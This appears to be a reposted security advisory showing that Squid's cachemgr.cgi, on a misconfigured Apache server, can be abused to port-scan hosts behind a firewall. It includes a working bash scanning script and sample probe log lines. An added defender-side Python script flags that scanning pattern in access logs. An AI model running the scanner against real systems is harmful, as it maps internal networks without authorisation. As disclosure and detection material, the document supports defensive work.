COMMAND

cachemgr.cgi shipped with Squid can be fooled to scan hosts behind firewalls

SYSTEMS AFFECTED

Tested on: Linux Redhat 6.2, Squid 2.3STABLE4, Apache 1.3.12

PROBLEM

In Francisco Sáa Muñoz's advisory [http://www.ip6seguridad.com]:

Due to a misconfiguration on Apache and Squid, it is possible to use cachemgr.cgi, shipped with Squid, to scan hosts under the corporate firewall. There is a little script to demonstrate the error, not so clean, but useful.

--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x
# Port scanning using a misconfigured squid
# using open apache
# Usage miscachemgr host_vuln host_to_scan end_port
# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz
# Coded by Francisco Sáa Muñoz
# IP6 [Logic Control]
PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='
mkdir from_$1_to_$2
while [ $PORT -lt $3 ]; do
# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1
lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
let PORT=PORT+1
done
--- End nasty Code ---

SOLUTION

Deny access to the cgi
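Added example (not part of the advisory or of Squid): a defender-side check that reads Apache Common Log Format access-log lines and flags clients that drive cachemgr.cgi at hosts other than the local cache or walk through many distinct port values, which is the pattern the script above produces. The log lines, the client addresses and the function names are constructed for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Hosts cachemgr.cgi is legitimately pointed at: the cache on the same box.
LOCAL_HOSTS = {"localhost", "127.0.0.1"}

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2001:10:00:01 +0000] "GET /cgi-bin/cachemgr.cgi?host=192.168.1.10&port=1&user_name=&operation&auth= HTTP/1.0" 200 512
10.0.0.5 - - [01/Jan/2001:10:00:02 +0000] "GET /cgi-bin/cachemgr.cgi?host=192.168.1.10&port=2&user_name=&operation&auth= HTTP/1.0" 200 512
10.0.0.5 - - [01/Jan/2001:10:00:03 +0000] "GET /cgi-bin/cachemgr.cgi?host=192.168.1.10&port=22&user_name=&operation&auth= HTTP/1.0" 200 512
10.0.0.7 - - [01/Jan/2001:10:01:00 +0000] "GET /cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=admin&operation=info&auth= HTTP/1.0" 200 4096
10.0.0.9 - - [01/Jan/2001:10:02:00 +0000] "GET /index.html HTTP/1.0" 200 1024
"""


def parse_cachemgr_request(line):
    """Return (client, host, port) for a cachemgr.cgi request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/cachemgr.cgi"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    host = qs.get("host", [""])[0]
    port = qs.get("port", [""])[0]
    return m.group("client"), host, port


def find_scans(log_text, min_ports=3):
    """Group cachemgr.cgi hits by (client, target host); flag pairs that touched
    at least min_ports distinct ports or aimed cachemgr at a non-local host."""
    ports_seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_cachemgr_request(line)
        if rec:
            client, host, port = rec
            ports_seen[(client, host)].add(port)
    flagged = {}
    for (client, host), seen in ports_seen.items():
        if len(seen) >= min_ports or host not in LOCAL_HOSTS:
            flagged[(client, host)] = sorted(seen, key=lambda p: int(p) if p.isdigit() else -1)
    return flagged
```

Running `find_scans(SAMPLE_LOG)` reports only the 10.0.0.5 client probing 192.168.1.10; the admin request against localhost and the unrelated page hit are ignored.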